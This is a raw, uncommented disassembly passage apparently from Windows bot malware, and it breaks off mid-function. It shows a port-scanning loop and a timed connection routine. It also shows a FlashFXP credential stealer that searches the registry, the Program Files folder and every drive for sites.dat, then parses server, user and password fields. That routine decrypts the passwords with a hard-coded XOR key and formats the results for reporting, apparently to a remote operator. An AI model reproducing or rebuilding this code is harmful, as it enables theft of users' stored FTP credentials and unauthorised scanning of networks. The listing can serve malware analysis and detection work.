; Attributes: bp-based frame
sub_4141C1 proc near ; DATA XREF: sub_4142BF+E2�o
var_2BC = dword ptr -2BCh
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1B2 = dword ptr -1B2h
var_1AE = byte ptr -1AEh
var_16 = byte ptr -16h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2BCh
push 2B1h
push [ebp+arg_0]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push [ebp+var_1B2]
push 0
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41424F
push [ebp+var_8]
call sub_4053B1
pop ecx
call sub_416B64 ; clock
sub eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D050
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41424F: ; CODE XREF: sub_4141C1+56�j
movsx eax, [ebp+var_16]
test eax, eax
jnz short loc_4142AD
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, [ebp+var_1B2]
jb short loc_41428B
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D018
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41428B: ; CODE XREF: sub_4141C1+A4�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41CFE8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
loc_4142AD: ; CODE XREF: sub_4141C1+8C�j
; sub_4141C1+94�j ...
push [ebp+var_2BC]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_4141C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142BF proc near ; CODE XREF: sub_40A9CF+1B5E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_4142D0
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142D0: ; CODE XREF: sub_4142BF+A�j
cmp [ebp+arg_8], 0
jnz short loc_4142DD
mov [ebp+arg_8], offset a80 ; "80"
loc_4142DD: ; CODE XREF: sub_4142BF+15�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4142F8
cmp [ebp+var_8], 0FFFFh
jbe short loc_4142FD
loc_4142F8: ; CODE XREF: sub_4142BF+2E�j
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142FD: ; CODE XREF: sub_4142BF+37�j
cmp [ebp+arg_C], 0
jz short loc_414311
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_414318
; ---------------------------------------------------------------------------
loc_414311: ; CODE XREF: sub_4142BF+42�j
mov [ebp+var_10], 0EA60h
loc_414318: ; CODE XREF: sub_4142BF+50�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41432D
cmp [ebp+var_4], 36EE80h
jbe short loc_41432F
loc_41432D: ; CODE XREF: sub_4142BF+63�j
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_41432F: ; CODE XREF: sub_4142BF+6C�j
push 2B1h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_414345
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_414345: ; CODE XREF: sub_4142BF+82�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_C]
add eax, 104h
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax+10Ah], ecx
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 10Eh
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41D080
push 0
push [ebp+var_C]
push offset sub_4141C1
call sub_4095A4
add esp, 18h
locret_4143AE: ; CODE XREF: sub_4142BF+C�j
; sub_4142BF:loc_4142F8�j ...
leave
retn
sub_4142BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143B0 proc near ; DATA XREF: sub_414600+1D6�o
var_2E8 = qword ptr -2E8h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = byte ptr -2CCh
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = byte ptr -2BCh
var_1BC = word ptr -1BCh
var_1BA = word ptr -1BAh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_18 = byte ptr -18h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2DCh
push 2B3h
push [ebp+arg_0]
lea eax, [ebp+var_2C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov ax, [ebp+var_1BC]
mov [ebp+var_C], ax
push [ebp+var_1B4]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41440C
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4145FC
; ---------------------------------------------------------------------------
loc_41440C: ; CODE XREF: sub_4143B0+47�j
push [ebp+var_1B4]
movzx eax, [ebp+var_1BA]
push eax
movzx eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_2BC]
push eax
mov eax, [ebp+var_2C0]
push dword ptr [eax]
push offset dword_41D0F0
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_414458
push 3E8h
call dword_41709C ; Sleep
loc_414458: ; CODE XREF: sub_4143B0+9B�j
call sub_416B64 ; clock
mov [ebp+var_2C4], eax
and [ebp+var_4], 0
loc_414467: ; CODE XREF: sub_4143B0+13A�j
; sub_4143B0+1F0�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jnz short loc_414482
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jle short loc_414487
loc_414482: ; CODE XREF: sub_4143B0+C1�j
jmp loc_4145A5
; ---------------------------------------------------------------------------
loc_414487: ; CODE XREF: sub_4143B0+D0�j
push 0Ah
lea eax, [ebp+var_2CC]
push eax
movzx eax, [ebp+var_C]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+var_8]
push 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_2D0], eax
mov ax, [ebp+var_C]
add ax, 1
mov [ebp+var_C], ax
cmp [ebp+var_2D0], 0
jz short loc_4144EF
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jg short loc_4144EF
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4144EF: ; CODE XREF: sub_4143B0+129�j
; sub_4143B0+138�j
push [ebp+var_1B8]
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_414597
loc_41450C: ; CODE XREF: sub_4143B0+1E2�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jz short loc_41451A
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_41451A: ; CODE XREF: sub_4143B0+166�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_2D8], eax
cmp [ebp+var_2D8], 0
jnz short loc_414534
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_414534: ; CODE XREF: sub_4143B0+180�j
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2D8]
call sub_4045B2
pop ecx
pop ecx
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov al, [ebp+var_18]
mov [ebp+var_2D4], al
and [ebp+var_18], 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
push offset dword_41D0DC
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_2D4]
mov [ebp+var_18], al
push 3E8h
call dword_41709C ; Sleep
jmp loc_41450C
; ---------------------------------------------------------------------------
loc_414597: ; CODE XREF: sub_4143B0+156�j
; sub_4143B0+168�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4145A5: ; CODE XREF: sub_4143B0:loc_414482�j
push [ebp+var_4]
call sub_416B64 ; clock
sub eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
fild [ebp+var_2DC]
fdiv flt_417270
push ecx
push ecx
fstp [esp+2E8h+var_2E8]
lea eax, [ebp+var_2BC]
push eax
push offset unk_41D0A0
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 18h
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
locret_4145FC: ; CODE XREF: sub_4143B0+57�j
leave
retn 4
sub_4143B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414600 proc near ; CODE XREF: sub_40A9CF+C9C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 28h
cmp [ebp+arg_4], 0
jz short loc_414612
cmp [ebp+arg_8], 0
jnz short loc_414617
loc_414612: ; CODE XREF: sub_414600+A�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414617: ; CODE XREF: sub_414600+10�j
cmp [ebp+arg_C], 0
jnz short loc_414623
mov eax, [ebp+arg_8]
mov [ebp+arg_C], eax
loc_414623: ; CODE XREF: sub_414600+1B�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41463E
cmp [ebp+var_8], 0FFFFh
jbe short loc_414643
loc_41463E: ; CODE XREF: sub_414600+33�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414643: ; CODE XREF: sub_414600+3C�j
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_41465E
cmp [ebp+var_14], 0FFFFh
jbe short loc_414663
loc_41465E: ; CODE XREF: sub_414600+53�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414663: ; CODE XREF: sub_414600+5C�j
push 2B3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41467C
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_41467C: ; CODE XREF: sub_414600+75�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jbe short loc_414696
mov eax, [ebp+var_14]
mov [ebp+var_18], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
loc_414696: ; CODE XREF: sub_414600+82�j
cmp [ebp+arg_10], 0
jz short loc_4146AA
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4146B1
; ---------------------------------------------------------------------------
loc_4146AA: ; CODE XREF: sub_414600+9A�j
mov [ebp+var_1C], 7D0h
loc_4146B1: ; CODE XREF: sub_414600+A8�j
mov eax, [ebp+var_1C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4146C6
cmp [ebp+var_C], 0EA60h
jbe short loc_4146CD
loc_4146C6: ; CODE XREF: sub_414600+BB�j
mov [ebp+var_C], 7D0h
loc_4146CD: ; CODE XREF: sub_414600+C4�j
cmp [ebp+arg_14], 0
jz short loc_4146E1
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_20], eax
jmp short loc_4146E8
; ---------------------------------------------------------------------------
loc_4146E1: ; CODE XREF: sub_414600+D1�j
mov [ebp+var_20], 100h
loc_4146E8: ; CODE XREF: sub_414600+DF�j
mov eax, [ebp+var_20]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4146FD
cmp [ebp+var_10], 200h
jbe short loc_414704
loc_4146FD: ; CODE XREF: sub_414600+F2�j
mov [ebp+var_10], 100h
loc_414704: ; CODE XREF: sub_414600+FB�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_8]
mov [eax+104h], cx
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_14]
mov [eax+106h], cx
cmp [ebp+var_C], 0EA60h
jbe short loc_414749
mov [ebp+var_24], 0EA60h
jmp short loc_41474F
; ---------------------------------------------------------------------------
loc_414749: ; CODE XREF: sub_414600+13E�j
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
loc_41474F: ; CODE XREF: sub_414600+147�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_24]
mov [eax+108h], ecx
cmp [ebp+var_10], 200h
jbe short loc_41476D
mov [ebp+var_28], 200h
jmp short loc_414773
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414600+162�j
mov eax, [ebp+var_10]
mov [ebp+var_28], eax
loc_414773: ; CODE XREF: sub_414600+16B�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
mov [eax+10Ch], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 110h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+10Ch]
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+106h]
push eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+104h]
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
push offset dword_41D138
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_4143B0
call sub_4095A4
add esp, 20h
locret_4147E3: ; CODE XREF: sub_414600:loc_414612�j
; sub_414600:loc_41463E�j ...
leave
retn
sub_414600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147E5 proc near ; CODE XREF: sub_414A1E+373�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414816
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414816: ; CODE XREF: sub_4147E5+28�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
loc_41481E: ; CODE XREF: sub_4147E5:loc_4148BE�j
lea eax, [ebp+var_C]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414842
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414842: ; CODE XREF: sub_4147E5+54�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
xor ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
cmp eax, [ebp+var_C]
jl short loc_414866
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
loc_414866: ; CODE XREF: sub_4147E5+78�j
mov eax, [ebp+var_C]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414899
xor eax, eax
jmp short locret_4148CC
; ---------------------------------------------------------------------------
loc_414899: ; CODE XREF: sub_4147E5+AE�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148B2
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
loc_4148B2: ; CODE XREF: sub_4147E5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148BE
jmp short loc_4148C3
; ---------------------------------------------------------------------------
loc_4148BE: ; CODE XREF: sub_4147E5+D5�j
jmp loc_41481E
; ---------------------------------------------------------------------------
loc_4148C3: ; CODE XREF: sub_4147E5+D7�j
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
push 1
pop eax
locret_4148CC: ; CODE XREF: sub_4147E5+2C�j
; sub_4147E5+58�j ...
leave
retn
sub_4147E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148CE proc near ; CODE XREF: sub_414A1E+30�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push 20019h
push 0
push offset aSoftwareClasse ; "SOFTWARE\\Classes\\Applications\\FlashFXP."...
push 80000002h
call dword_417008 ; RegOpenKeyExA
mov [ebp+var_10], eax
mov [ebp+var_4], 104h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
push 0
push 0
push 0
push [ebp+var_14]
call dword_41700C ; RegQueryValueExA
mov [ebp+var_10], eax
push [ebp+var_14]
call dword_417028 ; RegCloseKey
cmp [ebp+var_10], 0
jnz short loc_414971
push offset aFlashfxp_exe1 ; "FlashFXP.exe %1"
push 4
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_414945
jmp loc_414A17
; ---------------------------------------------------------------------------
loc_414945: ; CODE XREF: sub_4148CE+70�j
push offset aSites_dat ; "sites.dat"
push [ebp+var_18]
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+var_18]
add eax, 0Fh
push eax
mov eax, [ebp+var_18]
add eax, 9
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 1
pop eax
jmp locret_414A1C
; ---------------------------------------------------------------------------
loc_414971: ; CODE XREF: sub_4148CE+55�j
; sub_4148CE:loc_414A17�j
push 104h
push [ebp+arg_0]
push offset aProgramfiles ; "ProgramFiles"
call dword_417104 ; GetEnvironmentVariableA
push offset aFlashfxpSites_ ; "\\FlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4149B0
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_4149B0: ; CODE XREF: sub_4148CE+DB�j
mov eax, dword_419398
mov [ebp+var_C], eax
loc_4149B8: ; CODE XREF: sub_4148CE+143�j
lea eax, [ebp+var_C]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 5
jz short loc_414A02
cmp [ebp+var_1C], 2
jz short loc_414A02
lea eax, [ebp+var_C]
push eax
push offset aSflashfxpSites ; "%sFlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 0Ch
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414A02
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A02: ; CODE XREF: sub_4148CE+FB�j
; sub_4148CE+101�j ...
mov al, byte ptr [ebp+var_C]
add al, 1
mov byte ptr [ebp+var_C], al
movsx eax, byte ptr [ebp+var_C]
cmp eax, 5Ah
jnz short loc_4149B8
xor eax, eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A17: ; CODE XREF: sub_4148CE+72�j
jmp loc_414971
; ---------------------------------------------------------------------------
locret_414A1C: ; CODE XREF: sub_4148CE+9E�j
; sub_4148CE+E0�j ...
leave
retn
sub_4148CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A1E proc near ; DATA XREF: sub_414EB0+35�o
var_5E0 = dword ptr -5E0h
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = byte ptr -5C4h
var_544 = byte ptr -544h
var_4C4 = byte ptr -4C4h
var_444 = byte ptr -444h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = byte ptr -3B4h
var_334 = dword ptr -334h
var_330 = byte ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_190 = byte ptr -190h
var_184 = dword ptr -184h
var_180 = byte ptr -180h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5E0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_32C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_180]
push eax
call sub_4148CE
pop ecx
test eax, eax
jnz short loc_414A6B
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp locret_414EAC
; ---------------------------------------------------------------------------
loc_414A6B: ; CODE XREF: sub_414A1E+38�j
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D308
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_184], 0
and [ebp+var_334], 0
mov al, [ebp+var_190]
mov [ebp+var_330], al
and [ebp+var_190], 0
push offset aRb ; "rb"
lea eax, [ebp+var_180]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0
jnz short loc_414ACF
jmp loc_414EAA
; ---------------------------------------------------------------------------
loc_414ACF: ; CODE XREF: sub_414A1E+AA�j
push 2
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_3C4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_3C0], eax
cmp [ebp+var_3C0], 100000h
jnb short loc_414B0D
mov eax, [ebp+var_3C0]
mov [ebp+var_5E0], eax
jmp short loc_414B17
; ---------------------------------------------------------------------------
loc_414B0D: ; CODE XREF: sub_414A1E+DF�j
mov [ebp+var_5E0], 100000h
loc_414B17: ; CODE XREF: sub_414A1E+ED�j
mov eax, [ebp+var_5E0]
mov [ebp+var_3C0], eax
push 0
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
mov eax, [ebp+var_3C0]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_3BC], eax
cmp [ebp+var_3BC], 0
jnz short loc_414B63
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
jmp loc_414EA8
; ---------------------------------------------------------------------------
loc_414B63: ; CODE XREF: sub_414A1E+132�j
push [ebp+var_3C4]
push [ebp+var_3C0]
push 1
push [ebp+var_3BC]
call sub_416B90 ; fread
add esp, 10h
push [ebp+var_3C4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_3BC]
add eax, [ebp+var_3C0]
and byte ptr [eax], 0
mov eax, [ebp+var_3BC]
mov [ebp+var_3B8], eax
loc_414BA6: ; CODE XREF: sub_414A1E+428�j
push offset dword_41D300
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5DC], eax
mov eax, [ebp+var_3B8]
mov [ebp+var_5D0], eax
push offset dword_41D2F8
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5C8], eax
push offset dword_41D2F0
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D8], eax
push offset dword_41D2E8
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5CC], eax
push offset dword_41D2E0
push [ebp+var_3B8]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5D4], eax
cmp [ebp+var_5C8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C52
mov eax, [ebp+var_5C8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C52: ; CODE XREF: sub_414A1E+220�j
cmp [ebp+var_5D8], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414C7A
mov eax, [ebp+var_5D8]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414C7A: ; CODE XREF: sub_414A1E+248�j
cmp [ebp+var_5CC], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CA2
mov eax, [ebp+var_5CC]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CA2: ; CODE XREF: sub_414A1E+270�j
cmp [ebp+var_5D4], 0
jz loc_414E13
cmp [ebp+var_5DC], 0
jz short loc_414CCA
mov eax, [ebp+var_5D4]
cmp eax, [ebp+var_5DC]
jnb loc_414E13
loc_414CCA: ; CODE XREF: sub_414A1E+298�j
and [ebp+var_4C4], 0
mov al, [ebp+var_4C4]
mov [ebp+var_3B4], al
mov al, [ebp+var_3B4]
mov [ebp+var_5C4], al
mov al, [ebp+var_5C4]
mov [ebp+var_444], al
mov al, [ebp+var_444]
mov [ebp+var_544], al
lea eax, [ebp+var_544]
push eax
push offset dword_41D2D4
push [ebp+var_5D0]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_444]
push eax
push offset dword_41D2C4
push [ebp+var_5C8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_5C4]
push eax
push offset dword_41D2B4
push [ebp+var_5D8]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_3B4]
push eax
push offset dword_41D2A4
push [ebp+var_5CC]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
push offset aPass127s ; "\r\nPass=%127s\r\n"
push [ebp+var_5D4]
call sub_416BA2 ; sscanf
add esp, 0Ch
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_4C4]
push eax
call sub_4147E5
pop ecx
pop ecx
test eax, eax
jnz short loc_414DA1
jmp loc_414E4B
; ---------------------------------------------------------------------------
loc_414DA1: ; CODE XREF: sub_414A1E+37C�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp+var_544]
push eax
lea eax, [ebp+var_5C4]
push eax
lea eax, [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
lea eax, [ebp+var_3B4]
push eax
push [ebp+var_334]
push offset dword_41D268
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 20h
mov eax, [ebp+var_32C]
cmp dword ptr [eax+4], 0
jz short loc_414E13
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
jmp loc_414EA6
; ---------------------------------------------------------------------------
loc_414E13: ; CODE XREF: sub_414A1E+213�j
; sub_414A1E+22E�j ...
mov eax, [ebp+var_184]
inc eax
mov [ebp+var_184], eax
mov eax, [ebp+var_5DC]
mov [ebp+var_3B8], eax
cmp [ebp+var_3B8], 0
jnz short loc_414E37
jmp short loc_414E4B
; ---------------------------------------------------------------------------
loc_414E37: ; CODE XREF: sub_414A1E+415�j
mov eax, [ebp+var_3B8]
add eax, 4
mov [ebp+var_3B8], eax
